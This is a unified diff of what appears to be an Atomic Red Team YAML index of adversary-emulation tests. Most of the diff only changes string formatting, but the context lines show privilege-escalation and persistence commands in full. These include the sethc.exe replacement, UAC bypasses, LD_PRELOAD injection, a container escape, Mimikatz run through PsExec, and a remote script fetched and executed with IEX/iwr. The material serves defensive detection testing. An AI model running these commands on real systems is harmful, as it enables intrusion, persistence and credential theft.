prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat - ' +' executor: command: 'import -window root #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour - ' +' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore - ' +' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: @@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" @@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1547.001: @@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 